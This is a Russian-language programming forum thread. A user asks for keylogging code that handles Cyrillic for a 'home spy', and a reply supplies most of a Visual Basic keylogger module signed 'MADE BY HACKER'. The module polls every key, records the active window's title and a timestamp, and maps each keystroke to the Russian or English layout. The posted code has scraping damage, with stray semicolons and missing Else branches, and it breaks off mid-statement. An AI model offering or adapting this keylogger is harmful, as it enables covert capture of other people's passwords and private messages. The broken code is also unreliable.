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  Вопрос: Нужен код снифера Добавлено: 14.03.07 17:23  

Автор вопроса:  Programmer
Делаю "домашний" шпион, не секрет :).
Нужен норм. код снифера, чтобы роботал во всех виндах,
не виснул, не испольовал "Hook в DLL" и РАЗЛИЧАЛ НАКОНЕЦТО РУССКИЕ БУКВЫ.

Посмотреть исходник того, что я успел сделать вы можете на
У меня винда98. Говорят он не роботает в ХР.
А мне надо, чтобы везде работал, не виснул и различал русские буквы(GetAsyncKeyState не годиться).

Также хотелось бы посмотреть если не снифер(искал - не нашол), так хотя бы Firewall для инета. Или исходник нормального прокси, чтобы мог скачивать большие файлы, и работал с несколькими соединениями одновременно.
Все в исходники, очень нужно,
обязуюсь использовать только на домашнем компе и т. д. :)

Заранее большое спосибо!


  Ответы Всего ответов: 18  

Номер ответа: 1
Автор ответа:


Разработчик Offline Client

Вопросов: 236
Ответов: 8362
 Профиль | | #1 Добавлено: 14.03.07 20:13
Без хука нормально неполучится...

Более-мение не виснувший, без хука, различающий русские буквы...

Attribute VB_Name = "KeyLoger"
'                                                           |
' = = = = = = = M A D E   B Y   H A C K E R = = = = = =     |
'         icq: 826747, mail:           |


'  -  Отличает русскую и английскую раскладку
'  -  Не требует установки хука на клаву
'  -  Легко в использовать в своих программах

Private Declare Function Getasynckeystate Lib "user32" Alias "GetAsyncKeyState" (ByVal VKEY As Long) As Integer
Private Declare Function GetKeyState Lib "user32" (ByVal nVirtKey As Long) As Integer
Private Declare Function GetForegroundWindow Lib "user32.dll" () As Long
Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Private Declare Function GetWindowTextLength Lib "user32" Alias "GetWindowTextLengthA" (ByVal hwnd As Long) As Long
Private Declare Function GetKeyboardLayout Lib "user32" (ByVal dwLayout As Long) As Long
Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long
Private Declare Function GetLocaleInfo Lib "kernel32" Alias "GetLocaleInfoA" (ByVal Locale As Long, ByVal LCType As Long, ByVal lpLCData As String, ByVal cchData As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Const LOCALE_SENGLANGUAGE = &H1001
Private Const VK_CAPITAL = &H14

Dim AllKeyLog As String
Dim currentwindow As String

Private Function Get_Name_ActiveWindows() As String
'Возвращает имя активного
    Dim MyStr As String
    MyStr = String(GetWindowTextLength(GetForegroundWindow) + 1, Chr$(0))
    GetWindowText GetForegroundWindow, MyStr, Len(MyStr)
    Get_Name_ActiveWindows = MyStr
End Function

Private Function Get_hWND_Window(WindowName$) As Long
'Возвращает хендл по имени
 Dim hwnd
 hwnd = FindWindow(vbNullString, WindowName$)
 Get_hWND_Window = hwnd
End Function

Private Function GetCaption(WindowHandle As Long) As String
'Возвращает имя окна по хенделу
    Dim Buffer As String, TextLength As Long
    TextLength& = GetWindowTextLength(WindowHandle&;)
    Buffer$ = String(TextLength&, 0&;)
    Call GetWindowText(WindowHandle&, Buffer$, TextLength& + 1)
    GetCaption$ = Buffer$
End Function

Private Function GetLanguageInfo(ByVal hwnd As Long) As String
'Возвращает раскладку в указаном окне по hWnd
Dim sReturn As String, nRet As Long
Dim pID As Long, tId As Long, LCID As Long
tId = GetWindowThreadProcessId(hwnd, pID)
LCID = LoWord(GetKeyboardLayout(tId))
sReturn = String$(128, 0)
nRet = GetLocaleInfo(LCID, LOCALE_SENGLANGUAGE, sReturn, Len(sReturn))
If nRet > 0 Then GetLanguageInfo = Left$(sReturn, nRet - 1)
End Function
Private Function LoWord(DWORD As Long) As Integer
If DWORD And &H8000& Then
LoWord = &H8000 Or (DWORD And &H7FFF&;)
LoWord = DWORD And &HFFFF&
End If
End Function

Private Function GetLanguage() As String
'Возвращает раскладку в активном окне
GetLanguage = GetLanguageInfo(Get_hWND_Window(Get_Name_ActiveWindows))
End Function

Private Function CAPSLOCKON() As Boolean
'Возвращает состояние CAPS Lock 'a

Static bInit As Boolean
Static bOn As Boolean
If Not bInit Then
While Getasynckeystate(VK_CAPITAL)
bOn = GetKeyState(VK_CAPITAL)
bInit = True
If Getasynckeystate(VK_CAPITAL) Then
While Getasynckeystate(VK_CAPITAL)
bOn = Not bOn
End If
End If
End Function
Public Function GetKeyLog() As String
'Возвращает весь лог что мы нажимали... (или не мы :) )
Dim tmp As String, sData As String

Dim pos1 As Long, pos2 As Long, i As Long
Dim tmpArr() As String

tmpArr = Split(AllKeyLog, "![";)

For intIndex = 0 To UBound(tmpArr)
    sData$ = tmpArr(intIndex)
    pos1 = InStr(1, sData$, "]!", 1):  If pos1 = 0 Then GoTo nextIndex
    okno$ = Mid$(sData$, 1, pos1 - 1)
    sData$ = Mid$(sData$, pos1 + 2, Len(sData$))
    tmp$ = sData$
    For i = 1 To Len(sData$)
        pos1 = 0
        pos1 = InStr(i, sData$, "{", 1): If pos1 = 0 Then Exit For
        pos2 = InStr(pos1, sData$, "}", 1): If pos2 = 0 Then Exit For
        tmp$ = Replace(tmp$, Mid$(tmp$, pos1 - 1, pos2 - pos1 + 1), "";)
        i = pos1
    Next i
    If Len(Trim$(tmp$)) > 4 And Len(Trim$(tmp$)) < 20 Then
        GetKeyLog = GetKeyLog & "[" & okno$ & "]" & vbCrLf & sData$ & vbCrLf & vbCrLf & vbCrLf
    End If
Next intIndex

End Function

Public Sub KeyLog()
'Эту подпрограмму нужно вызывать в таймере с минимальным интервалом
'Кейлог будет записан в переменную AllKeyLog

'Тут вообщем долгая муть проверки нажатой кнопки, сравнения с раскладкой клавы, ну и вообще
'формирование лога...

If currentwindow <> GetCaption(GetForegroundWindow) Then
currentwindow = GetCaption(GetForegroundWindow)
AllKeyLog = AllKeyLog & vbNewLine & "![Время: " & Now & "  Окно:" & currentwindow & "]!" & vbNewLine
End If

l$ = GetLanguage

Dim keystate As Long
Dim Shift As Long
Shift = Getasynckeystate(vbKeyShift)
keystate = Getasynckeystate(vbKeyA)

If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "A"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "Ф"
    End If
End If

If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "a"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "ф"
    End If
End If

keystate = Getasynckeystate(vbKeyB)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "B"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "И"
    End If
End If

If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "b"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "и"
    End If
End If

keystate = Getasynckeystate(vbKeyC)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "C"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "С"
    End If
End If

If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "c"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "с"
    End If
End If

keystate = Getasynckeystate(vbKeyD)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + ";D"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "В"
    End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "d"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "в"
    End If
End If
keystate = Getasynckeystate(vbKeyE)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "E"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "У"
    End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "e"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "у"
    End If
End If
keystate = Getasynckeystate(vbKeyF)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "F"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "А"
    End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "f"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "а"
    End If
End If
keystate = Getasynckeystate(vbKeyG)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "G"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "П"
    End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "g"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "п"
    End If
End If
keystate = Getasynckeystate(vbKeyH)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "H"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "Р"
    End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "h"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "р"
    End If
End If
keystate = Getasynckeystate(vbKeyI)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "I"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "Ш"
    End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "i"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "ш"
    End If
End If
keystate = Getasynckeystate(vbKeyJ)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
    AllKeyLog = AllKeyLog + "J"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "О"
    End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
    AllKeyLog = AllKeyLog + "j"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "о"
    End If
End If
keystate = Getasynckeystate(vbKeyK)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "K"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "Л"
    End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "k"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "л"
    End If
End If
keystate = Getasynckeystate(vbKeyL)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "L"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "Д"
    End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "l"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "д"
    End If
End If
keystate = Getasynckeystate(vbKeyM)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "M"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "Ь"
    End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "m"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "ь"
    End If
End If
keystate = Getasynckeystate(vbKeyN)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "N"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "Т"
    End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "n"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "т"
    End If
End If
keystate = Getasynckeystate(vbKeyO)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "O"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "Щ"
    End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "o"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "щ"
    End If
End If
keystate = Getasynckeystate(vbKeyP)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "P"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "З"
    End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "p"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "з"
    End If
End If
keystate = Getasynckeystate(vbKeyQ)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "Q"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "Й"
    End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "q"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "й"
    End If
End If
keystate = Getasynckeystate(vbKeyR)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "R"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "К"
    End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "r"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "к"
    End If
End If
keystate = Getasynckeystate(vbKeyS)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "S"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "Ы"
    End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "s"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "ы"
    End If
End If
keystate = Getasynckeystate(vbKeyT)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "T"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "Е"
    End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "t"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "е"
    End If
End If
keystate = Getasynckeystate(vbKeyU)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "U"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "Г"
    End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "u"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "г"
    End If
End If
keystate = Getasynckeystate(vbKeyV)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "V"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "М"
    End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "v"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "м"
    End If
End If
keystate = Getasynckeystate(vbKeyW)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "W"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "Ц"
    End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "w"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "ц"
    End If
End If
keystate = Getasynckeystate(vbKeyX)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "X"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "Ч"
    End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "x"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "ч"
    End If
End If
keystate = Getasynckeystate(vbKeyY)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "Y"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "Н"
    End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "y"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "н"
    End If
End If
keystate = Getasynckeystate(vbKeyZ)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "Z"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "Я"
    End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "z"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "я"
    End If
End If
keystate = Getasynckeystate(vbKey1)
If Shift = 0 And (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "1"
      End If
      If Shift <> 0 And (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "!"
End If
keystate = Getasynckeystate(vbKey2)
If Shift = 0 And (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "2"
      End If
      If Shift <> 0 And (keystate And &H1) = &H1 Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "@"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + Chr(34)
    End If
End If
keystate = Getasynckeystate(vbKey3)
If Shift = 0 And (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "3"
      End If
      If Shift <> 0 And (keystate And &H1) = &H1 Then

    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "#"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "№"
    End If

End If
keystate = Getasynckeystate(vbKey4)
If Shift = 0 And (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "4"
      End If
If Shift <> 0 And (keystate And &H1) = &H1 Then

    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "$"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + ";"
    End If
End If
keystate = Getasynckeystate(vbKey5)
If Shift = 0 And (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "5"
      End If
            If Shift <> 0 And (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "%"
End If
keystate = Getasynckeystate(vbKey6)
If Shift = 0 And (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "6"
      End If
            If Shift <> 0 And (keystate And &H1) = &H1 Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "^"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + ":"
    End If
End If
keystate = Getasynckeystate(vbKey7)
If Shift = 0 And (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "7"
     End If
          If Shift <> 0 And (keystate And &H1) = &H1 Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + "&"
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "?"
    End If
End If
    keystate = Getasynckeystate(vbKey8)
If Shift = 0 And (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "8"
     End If
          If Shift <> 0 And (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "*"
End If
      keystate = Getasynckeystate(vbKey9)
If Shift = 0 And (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "9"
     End If
          If Shift <> 0 And (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + ";("
End If
      keystate = Getasynckeystate(vbKey0)
If Shift = 0 And (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "0"
     End If
          If Shift <> 0 And (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + ";)"
End If
     keystate = Getasynckeystate(vbKeyBack)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{bkspc}"
     End If
      keystate = Getasynckeystate(vbKeyTab)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{tab}"
     End If
      keystate = Getasynckeystate(vbKeyReturn)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + vbCrLf
     End If
      keystate = Getasynckeystate(vbKeyShift)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{shift}"
     End If
   keystate = Getasynckeystate(vbKeyControl)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{ctrl}"
     End If
   keystate = Getasynckeystate(vbKeyMenu)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{alt}"
     End If
   keystate = Getasynckeystate(vbKeyPause)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{pause}"
     End If
   keystate = Getasynckeystate(vbKeyEscape)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{esc}"
     End If
   keystate = Getasynckeystate(vbKeySpace)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + " "
     End If
      keystate = Getasynckeystate(vbKeyEnd)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{end}"
     End If
      keystate = Getasynckeystate(vbKeyHome)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{home}"
     End If
keystate = Getasynckeystate(vbKeyLeft)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{left}"
     End If
keystate = Getasynckeystate(vbKeyRight)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{right}"
     End If
keystate = Getasynckeystate(vbKeyUp)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{up}"
     End If
   keystate = Getasynckeystate(vbKeyDown)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{down}"
     End If
keystate = Getasynckeystate(vbKeyInsert)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{insert}"
     End If
keystate = Getasynckeystate(vbKeyDelete)
If (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "{Delete}"
     End If
keystate = Getasynckeystate(&HBA)
If Shift = 0 And (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + ";"
     End If
     If Shift <> 0 And (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + ":"
        End If
keystate = Getasynckeystate(&HBB)
If Shift = 0 And (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "="
     End If
     If Shift <> 0 And (keystate And &H1) = &H1 Then
  AllKeyLog = AllKeyLog + "+"
     End If
keystate = Getasynckeystate(&HBC)
If Shift = 0 And (keystate And &H1) = &H1 Then
    If l$ = "English" Then
    AllKeyLog = AllKeyLog + ","
    ElseIf l$ = "Russian" Then
    AllKeyLog = AllKeyLog + "б"
    End If
     End If
     If Shift <> 0 And (keystate And &H1) = &H1 Then
        If l$ = "English" Then
        AllKeyLog = AllKeyLog + "<"
        ElseIf l$ = "Russian" Then
        AllKeyLog = AllKeyLog + "Б"
        End If
    End If
keystate = Getasynckeystate(&HBD)
